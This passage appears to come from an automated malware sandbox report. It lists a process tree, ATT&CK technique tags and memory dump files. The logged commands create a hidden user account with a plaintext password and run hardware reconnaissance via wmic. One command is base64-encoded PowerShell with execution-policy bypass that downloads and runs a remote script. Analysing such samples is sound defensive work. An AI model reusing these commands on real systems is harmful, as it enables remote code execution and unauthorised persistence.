  - Suspicious use of WriteProcessMemory
  PID:1756
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc w6OkGKLL
    3⤵
    PID:1736

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
- Suspicious use of WriteProcessMemory
PID:2352
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  PID:1568

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:3080
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  PID:3960

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:4008
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:2260
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    PID:1308

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/804-171-0x0000020E44AF3000-0x0000020E44AF5000-memory.dmp

Filesize
8KB

Download
memory/804-170-0x0000020E44AF0000-0x0000020E44AF2000-memory.dmp

Filesize
8KB

Download
memory/804-174-0x0000020E44AF6000-0x0000020E44AF8000-memory.dmp

Filesize
8KB

Download
memory/804-212-0x0000020E44AF8000-0x0000020E44AFA000-memory.dmp

Filesize
8KB

Download
memory/1180-252-0x000001EB77236000-0x000001EB77238000-memory.dmp

Filesize
8KB

Download
memory/1180-253-0x000001EB77238000-0x000001EB7723A000-memory.dmp

Filesize
8KB

Download
memory/1180-214-0x000001EB77233000-0x000001EB77235000-memory.dmp

Filesize
8KB

Download
memory/1180-213-0x000001EB77230000-0x000001EB77232000-memory.dmp

Filesize
8KB

Download
memory/1308-380-0x000002177AD60000-0x000002177AD62000-memory.dmp

Filesize
8KB

Download
memory/1308-381-0x000002177AD63000-0x000002177AD65000-memory.dmp

Filesize
8KB

Download
memory/1308-382-0x000002177AD66000-0x000002177AD68000-memory.dmp

Filesize
8KB

Download
memory/1308-420-0x000002177AD68000-0x000002177AD69000-memory.dmp

Filesize
4KB

Download
memory/2568-289-0x0000024ACA5E8000-0x0000024ACA5EA000-memory.dmp

Filesize
8KB

Download
memory/2568-254-0x0000024ACA5E0000-0x0000024ACA5E2000-memory.dmp

Filesize
8KB

Download
memory/2568-255-0x0000024ACA5E3000-0x0000024ACA5E5000-memory.dmp

Filesize
8KB

Download
memory/2568-288-0x0000024ACA5E6000-0x0000024ACA5E8000-memory.dmp

Filesize
8KB

Download
memory/2652-120-0x00000171FE976000-0x00000171FE977000-memory.dmp

Filesize
4KB

Download
memory/2652-119-0x00000171FE975000-0x00000171FE976000-memory.dmp

Filesize
4KB

Download
memory/2652-117-0x00000171FE970000-0x00000171FE972000-memory.dmp

Filesize
8KB

Download
memory/2652-118-0x00000171FE973000-0x00000171FE975000-memory.dmp

Filesize
8KB

Download
memory/2652-115-0x00000171FED90000-0x00000171FF18F000-memory.dmp

Filesize
4.0MB

Download
memory/3584-160-0x00000260256F8000-0x00000260256F9000-memory.dmp

Filesize
4KB

Download
memory/3584-139-0x00000260256F3000-0x00000260256F5000-memory.dmp

Filesize
8KB

Download
memory/3584-140-0x00000260256F6000-0x00000260256F8000-memory.dmp

Filesize
8KB

Download
memory/3584-126-0x00000260257D0000-0x00000260257D1000-memory.dmp

Filesize
4KB

Download
memory/3584-129-0x000002603DB00000-0x000002603DB01000-memory.dmp

Filesize
4KB

Download
memory/3584-138-0x00000260256F0000-0x00000260256F2000-memory.dmp

Filesize
8KB

Download
memory/3584-145-0x000002603DA90000-0x000002603DA91000-memory.dmp

Filesize
4KB

Download
memory/3584-153-0x000002603E650000-0x000002603E651000-memory.dmp

Filesize
4KB

Download
memory/3584-152-0x000002603E2C0000-0x000002603E2C1000-memory.dmp

Filesize
4KB

Download